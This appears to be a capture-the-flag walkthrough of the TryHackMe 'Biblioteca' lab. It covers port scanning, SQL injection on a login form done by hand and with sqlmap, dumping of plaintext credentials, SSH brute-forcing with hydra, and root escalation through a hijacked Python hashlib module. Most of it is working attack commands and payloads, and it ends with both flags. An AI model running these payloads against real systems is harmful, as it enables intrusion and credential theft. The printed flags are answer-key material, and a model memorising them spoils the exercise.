Biblioteca
What is the user and root flag?
Start Machine
Hit 'em with the classics.
Answer the questions below
┌──(kali㉿kali)-[~/nappy]
└─$ rustscan -a 10.10.232.50 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.232.50:22
Open 10.10.232.50:8000
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-10 17:43 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:43
Completed Parallel DNS resolution of 1 host. at 17:43, 0.02s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:43
Scanning 10.10.232.50 [2 ports]
Discovered open port 22/tcp on 10.10.232.50
Discovered open port 8000/tcp on 10.10.232.50
Completed Connect Scan at 17:43, 0.21s elapsed (2 total ports)
Initiating Service scan at 17:43
Scanning 2 services on 10.10.232.50
Completed Service scan at 17:43, 6.94s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.232.50.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 6.25s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.82s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Nmap scan report for 10.10.232.50
Host is up, received user-set (0.20s latency).
Scanned at 2023-01-10 17:43:45 EST for 14s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 000bf9bf1d49a6c3fa9c5e08d16d8202 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjGXxdFr0mHKml76YqbA09iT/zirMlq63GKdZVLK3ey11u+RmZEpu+4kDoSpTomeHq5PzD2tOvC3xCmfe+r0yJuG+052rgshOHGP5Jsh49ZuOsCNBmf9d5nYQERArUohS+XWk5AzcOAvENMPrN52qZvnZAPBJUR2M3LUtxLeCXd/Pn47rnolC8kSoZnReUHuyDSK6V0KDsgz9gZfsZEasEVFWeQHSeX70stnpRIPEgB523+EjG9VbeBhSVXOaX99RvkwA2EKdX95fAllkmXIwfscKCDcvCKBx2b/64dA2E0tiXx6TTN1rpY47NB1LTHFyEzXhdY04xI4YWGR0OdlHiF22qTxZ40WNQSP1dfazgpEzXm6tpGD7dE9Ko+fgAy+6wCWOuw2rQVefv/hheU8idtl8S+A4LC9NupPmDFf28GVpMFkMry2/yjD7e8Z1Vl3ZBp/BO0IVUnm/fFrGBEJ2e0RJEzI0lWXbytFNZkCLAZt+8IQLsvPep80zxKM9Jlps=
| 256 a10c8e5df07fa532b2eb2f7abfedbf3d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBk6WcGKOLXNfFSm4hmo/IJAB/aFJ8ZihzQUm796VuMqs4aIusn5+Lu0C8pv8XB22fwBS8XuB6l9LjTo10CFmoQ=
| 256 9eefc90afce99eede32db130b65fd40b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBRsjiudT4XOiE2akDRkCkDkhVRMB7oIVMpgkeM63BmO
8000/tcp open http syn-ack Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Login
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
| http-methods:
|_ Supported Methods: GET OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:43
Completed NSE at 17:43, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.17 seconds
http://10.10.232.50:8000/
login page
Hi smokey!!</br></br> Welcome to the index page...
sqli (' or 1=1-- j)
let's use sqlmap (easy way)
┌──(kali㉿kali)-[~/nappy]
└─$ sqlmap -u http://10.10.232.50:8000/ --forms --dump
___
__H__
___ ___[']_____ ___ ___ {1.6.12#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:49:16 /2023-01-10/
[17:49:16] [INFO] testing connection to the target URL
[17:49:16] [INFO] searching for forms
[1/1] Form:
POST http://10.10.232.50:8000/login
POST data: username=&password=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n] Y
[17:49:37] [INFO] using '/home/kali/.local/share/sqlmap/output/results-01102023_0549pm.csv' as the CSV results file in multiple targets mode
[17:49:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:49:37] [INFO] testing if the target URL content is stable
[17:49:37] [INFO] target URL content is stable
[17:49:37] [INFO] testing if POST parameter 'username' is dynamic
[17:49:38] [WARNING] POST parameter 'username' does not appear to be dynamic
[17:49:38] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[17:49:38] [INFO] testing for SQL injection on POST parameter 'username'
[17:49:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:49:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:49:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:49:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:49:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:49:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:49:46] [INFO] testing 'Generic inline queries'
[17:49:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:49:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:49:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:49:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:50:00] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:50:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:50:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:50:35] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:50:36] [INFO] target URL appears to have 4 columns in query
[17:50:37] [INFO] POST parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=WiRV' AND (SELECT 8066 FROM (SELECT(SLEEP(5)))REjA) AND 'QLRG'='QLRG&password=
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: username=WiRV' UNION ALL SELECT NULL,CONCAT(0x717a6b7a71,0x46687666675a747166796863426f4e516344426b57504453544d554d526f536f4f42577047464c59,0x7171627871),NULL,NULL-- -&password=
---
do you want to exploit this SQL injection? [Y/n] Y
[17:50:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:50:56] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[17:50:56] [INFO] fetching current database
[17:50:56] [INFO] fetching tables for database: 'website'
[17:50:57] [INFO] fetching columns for table 'users' in database 'website'
[17:50:57] [INFO] fetching entries for table 'users' in database 'website'
Database: website
Table: users
[1 entry]
+----+-------------------+----------------+----------+
| id | email | password | username |
+----+-------------------+----------------+----------+
| 1 | smokey@email.boop | My_P@ssW0rd123 | smokey |
+----+-------------------+----------------+----------+
[17:50:57] [INFO] table 'website.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.232.50/dump/website/users.csv'
[17:50:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[17:50:57] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-01102023_0549pm.csv'
[*] ending @ 17:50:57 /2023-01-10/
now using burpsuite (save item to use with sqlmap later like sql.txt or another name)
send to repeater (response render to see output)
testing (first way)
username='+or+1=1-- -&password=witty (hi smokey)
username='+or+1=1#&password=witty (hi smokey)
SQL injection UNION attack, determining the number of columns returned by the query
username='+UNION+SELECT+NULL,NULL#&password=witty (internal error server so more colums)
username='+UNION+SELECT+NULL,NULL,NULL,NULL#&password=witty (Hi None! so there are 4 cols)
SQL injection UNION attack, finding a column containing text
username='+UNION+SELECT+NULL,'witty',NULL,NULL#&password=witty (Hi witty!)
SQL injection attack, querying the database type and version on MySQL and Microsoft
username='+UNION+SELECT+NULL,@@version,NULL,NULL#&password=witty (8.0.28 Ubuntu...)
username='+UNION+SELECT+NULL,database(),NULL,NULL#&password=witty
Hi website!!
username='+UNION+SELECT+NULL,table_name,NULL,NULL+FROM+information_schema.tables+WHERE+table_schema='website'#&password=witty
Hi users!!
username='+UNION+SELECT+NULL,column_name,NULL,NULL+FROM+information_schema.columns+WHERE+table_name='users'#&password=witty
Hi id!!
username='+UNION+SELECT+NULL,group_concat(column_name),NULL,NULL+FROM+information_schema.columns+WHERE+table_name='users'#&password=witty
Hi id,username,password,email!!
username='+UNION+SELECT+NULL,group_concat(username),NULL,NULL+FROM+users#&password=witty
Hi smokey!!
username='+UNION+SELECT+NULL,group_concat(password),NULL,NULL+FROM+users+WHERE+username='smokey'#&password=witty
Hi My_P@ssW0rd123!!
or
username='+union+select+null,group_concat(username,':',password),null,null+from+users--+&password=witty
Hi smokey:My_P@ssW0rd123!!
second way (in less steps)
username='+union+select+1,2,3,4--+&password=witty
Hi 2!!
username='+union+select+1,(select+group_concat(schema_name,"\r\n")+from+information_schema.schemata),3,4--+&password=witty
Hi information_schema
,website
username='+union+select+1,(select+group_concat(table_name,":",column_name,"\r\n")+from+information_schema.columns+where+table_schema='website'),3,4--+&password=witty
Hi users:id
,users:username
,users:password
,users:email
username='+union+select+1,(select+group_concat(username,":",password,"\r\n")+from+website.users),3,4--+&password=witty
Hi smokey:My_P@ssW0rd123
now sqlmap (step by step)
┌──(kali㉿kali)-[~/nappy]
└─$ sqlmap -h
___
__H__
___ ___[']_____ ___ ___ {1.6.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python3 sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
[!] to see full list of options run with '-hh'
┌──(kali㉿kali)-[~/nappy]
└─$ ls
admin.txt blog.html index.php sql.txt
┌──(kali㉿kali)-[~/nappy] (from burp)
└─$ cat sql.txt
<?xml version="1.0"?>
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="2022.8.2" exportTime="Tue Jan 10 17:56:32 EST 2023">
<item>
<time>Tue Jan 10 17:55:22 EST 2023</time>
<url><![CDATA[http://10.10.232.50:8000/login]]></url>
<host ip="10.10.232.50">10.10.232.50</host>
<port>8000</port>
<protocol>http</protocol>
<method><![CDATA[POST]]></method>
<path><![CDATA[/login]]></path>
<extension>null</extension>
<request base64="true"><![CDATA[UE9TVCAvbG9naW4gSFRUUC8xLjENCkhvc3Q6IDEwLjEwLjIzMi41MDo4MDAwDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQ7IHJ2OjEwMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwMi4wDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL2F2aWYsaW1hZ2Uvd2VicCwqLyo7cT0wLjgNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyOQ0KT3JpZ2luOiBodHRwOi8vMTAuMTAuMjMyLjUwOjgwMDANCkNvbm5lY3Rpb246IGNsb3NlDQpSZWZlcmVyOiBodHRwOi8vMTAuMTAuMjMyLjUwOjgwMDAvbG9naW4NCkNvb2tpZTogc2Vzc2lvbj1leUpwWkNJNk1Td2liRzluWjJWa2FXNGlPblJ5ZFdVc0luVnpaWEp1WVcxbElqb2ljMjF2YTJWNUluMC5ZNzNxOXcuQUhZN09sT0NQSFVEN21XTVdhNnd0YUNfSjNBDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQoNCnVzZXJuYW1lPXdpdHR5JnBhc3N3b3JkPXdpdHR5]]></request>
<status></status>
<responselength></responselength>
<mimetype></mimetype>
<response base64="true"></response>
<comment></comment>
</item>
</items>
sqlmap is an open-source command-line tool that automates the process of detecting and exploiting SQL injection vulnerabilities. The `-r` option is used to specify a file containing a list of HTTP requests to be tested for SQL injection vulnerabilities. The requests in the file must be in the format of HTTP request strings, such as those that can be exported from a web browser's developer tools.
The -dbs option in `sqlmap` is used to enumerate the names of databases available on the target server after a successful SQL injection has been established. When this option is specified, `sqlmap` will attempt to retrieve a list of databases from the database management system (DBMS) and display them in the command-line interface. This can be useful for discovering the names of databases that contain sensitive information, which can then be targeted for further exploitation. It should be used after a successfull injection point identified.
┌──(kali㉿kali)-[~/nappy]
└─$ sqlmap -r sql.txt --dbs --batch
___
__H__
___ ___[,]_____ ___ ___ {1.6.12#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:03:43 /2023-01-10/
[20:03:43] [INFO] parsing HTTP request from 'sql.txt'
[20:03:45] [INFO] resuming back-end DBMS 'mysql'
[20:03:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=WiRV' AND (SELECT 8066 FROM (SELECT(SLEEP(5)))REjA) AND 'QLRG'='QLRG&password=
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: username=WiRV' UNION ALL SELECT NULL,CONCAT(0x717a6b7a71,0x46687666675a747166796863426f4e516344426b57504453544d554d526f536f4f42577047464c59,0x7171627871),NULL,NULL-- -&password=
---
[20:03:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:03:45] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] website
[20:03:46] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.232.50'
[*] ending @ 20:03:46 /2023-01-10/
┌──(kali㉿kali)-[~/nappy]
└─$ sqlmap -r sql.txt -D website --tables --batch
___
__H__
___ ___[(]_____ ___ ___ {1.6.12#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:39:40 /2023-01-10/
[20:39:40] [INFO] parsing HTTP request from 'sql.txt'
[20:39:41] [INFO] resuming back-end DBMS 'mysql'
[20:39:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=WiRV' AND (SELECT 8066 FROM (SELECT(SLEEP(5)))REjA) AND 'QLRG'='QLRG&password=
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: username=WiRV' UNION ALL SELECT NULL,CONCAT(0x717a6b7a71,0x46687666675a747166796863426f4e516344426b57504453544d554d526f536f4f42577047464c59,0x7171627871),NULL,NULL-- -&password=
---
[20:39:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:39:42] [INFO] fetching tables for database: 'website'
Database: website
[1 table]
+-------+
| users |
+-------+
[20:39:42] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.232.50'
[*] ending @ 20:39:42 /2023-01-10/
┌──(kali㉿kali)-[~/nappy]
└─$ sqlmap -r sql.txt -D website -T users --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.6.12#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:40:36 /2023-01-10/
[20:40:36] [INFO] parsing HTTP request from 'sql.txt'
[20:40:36] [INFO] resuming back-end DBMS 'mysql'
[20:40:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=WiRV' AND (SELECT 8066 FROM (SELECT(SLEEP(5)))REjA) AND 'QLRG'='QLRG&password=
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: username=WiRV' UNION ALL SELECT NULL,CONCAT(0x717a6b7a71,0x46687666675a747166796863426f4e516344426b57504453544d554d526f536f4f42577047464c59,0x7171627871),NULL,NULL-- -&password=
---
[20:40:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[20:40:37] [INFO] fetching columns for table 'users' in database 'website'
[20:40:37] [INFO] fetching entries for table 'users' in database 'website'
Database: website
Table: users
[1 entry]
+----+-------------------+----------------+----------+
| id | email | password | username |
+----+-------------------+----------------+----------+
| 1 | smokey@email.boop | My_P@ssW0rd123 | smokey |
+----+-------------------+----------------+----------+
[20:40:37] [INFO] table 'website.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.232.50/dump/website/users.csv'
[20:40:37] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.232.50'
[*] ending @ 20:40:37 /2023-01-10/
┌──(kali㉿kali)-[~/nappy]
└─$ ssh smokey@10.10.232.50
The authenticity of host '10.10.232.50 (10.10.232.50)' can't be established.
ED25519 key fingerprint is SHA256:xpqbWswo65YJezxXRx18Va9jub3YGOEzi9N17Mhy9FE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.232.50' (ED25519) to the list of known hosts.
smokey@10.10.232.50's password: My_P@ssW0rd123
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 11 Jan 2023 01:41:26 AM UTC
System load: 0.0 Processes: 113
Usage of /: 58.3% of 9.78GB Users logged in: 0
Memory usage: 62% IPv4 address for eth0: 10.10.232.50
Swap usage: 0%
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Dec 7 03:21:42 2021 from 10.0.2.15
smokey@biblioteca:~$ id
uid=1000(smokey) gid=1000(smokey) groups=1000(smokey)
smokey@biblioteca:~$ groups
smokey
smokey@biblioteca:/home/hazel$ su hazel
Password:
su: Authentication failure
┌──(kali㉿kali)-[~/nappy]
└─$ hydra -l hazel -P /usr/share/wordlists/rockyou.txt 10.10.232.50 ssh -V -t 64
[22][ssh] host: 10.10.232.50 login: hazel password: hazel
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 20 final worker threads did not complete until end.
[ERROR] 20 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-10 20:58:33
hazel:hazel (sometimes username is the pass)
smokey@biblioteca:/home/hazel$ su hazel
Password:
hazel@biblioteca:~$ cat user.txt
THM{G0Od_OLd_SQL_1nj3ct10n_&_w3@k_p@sSw0rd$}
hazel@biblioteca:~$ cat hasher.py
import hashlib
def hashing(passw):
md5 = hashlib.md5(passw.encode())
print("Your MD5 hash is: ", end ="")
print(md5.hexdigest())
sha256 = hashlib.sha256(passw.encode())
print("Your SHA256 hash is: ", end ="")
print(sha256.hexdigest())
sha1 = hashlib.sha1(passw.encode())
print("Your SHA1 hash is: ", end ="")
print(sha1.hexdigest())
def main():
passw = input("Enter a password to hash: ")
hashing(passw)
if __name__ == "__main__":
main()
hazel@biblioteca:~$ python3 hasher.py
Enter a password to hash: hazel
Your MD5 hash is: 16b9652df79d0e4784bdbf478c9f4fee
Your SHA256 hash is: 9d053755e078005ef63af6258f5a743994a11d17daca304d49dec6c3ded3fba8
Your SHA1 hash is: f29ae37cab5058050a41b21befb382f26a5688c4
https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/
hazel@biblioteca:~$ sudo -l
Matching Defaults entries for hazel on biblioteca:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hazel may run the following commands on biblioteca:
(root) SETENV: NOPASSWD: /usr/bin/python3 /home/hazel/hasher.py
hazel@biblioteca:/tmp$ cat hashlib.py
import os
os.system("/bin/bash -p")
hazel@biblioteca:/tmp$ chmod +x hashlib.py
hazel@biblioteca:/tmp$ sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py
root@biblioteca:/tmp# cat /root/root.txt
THM{PytH0n_LiBr@RY_H1j@acKIn6}
What is the user flag?
Weak password
THM{G0Od_OLd_SQL_1nj3ct10n_&_w3@k_p@sSw0rd$}
What is the root flag?
THM{PytH0n_LiBr@RY_H1j@acKIn6}
[[Napping]]
Last updated
